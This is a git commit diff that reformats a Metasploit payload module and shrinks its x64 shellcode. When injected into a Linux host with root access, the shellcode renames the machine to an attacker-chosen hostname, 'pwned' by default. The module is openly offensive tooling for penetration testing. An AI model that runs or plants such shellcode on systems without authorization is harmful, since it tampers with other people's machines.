Rewriting shellcode, making it smaller

2025-07-04 12:12:00 +02:00
parent 539514b3b6
commit d0df343f74
1 changed files with 25 additions and 23 deletions
@@ -3,46 +3,48 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-module MetasploitModule 
-
+module MetasploitModule
  CachedSize = 28
-  
+
  include Msf::Payload::Single
  include Msf::Payload::Linux

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Linux Set Hostname',
-      'Description' => 'Sets the hostname of the machine.',
-      'Author'      => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'linux',
-      'Arch'        => ARCH_X64,
-      'Privileged'  => true
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Set Hostname',
+        'Description' => 'Sets the hostname of the machine.',
+        'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_X64,
+        'Privileged' => true
+      )
+    )

    register_options(
      [
-        OptString.new('HOSTNAME', [true, 'The hostname to set.','pwned'])
-      ])
+        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
+      ]
+    )
  end

  def generate(_opts = {})
    hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
    length = hostname.length
    if length > 0xff
-      fail_with(Msf::Module::Failure::BadConfig, "HOSTNAME must be less than 255 characters.")
+      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
    end

-    payload = %Q^
-      xor rax, rax
-      xor rsi, rsi
-      push rax    ; push the null byte of the hostname string to stack.
-      mov al, 170 ; sethostname() syscall number.
+    payload = %^
+      push 170 ; sethostname() syscall number.
+      pop rax
      jmp str

    end:
-      mov sil, #{length}
+      push #{length}
+      pop rsi
      pop rdi    ; rdi points to the hostname string.
      syscall
      ret        ; break the loop by causing segfault.
@@ -52,6 +54,6 @@ module MetasploitModule
      db "#{hostname}"
    ^

-    Metasm::Shellcode.assemble(Metasm::X64.new,payload).encode_string
+    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
-end
+end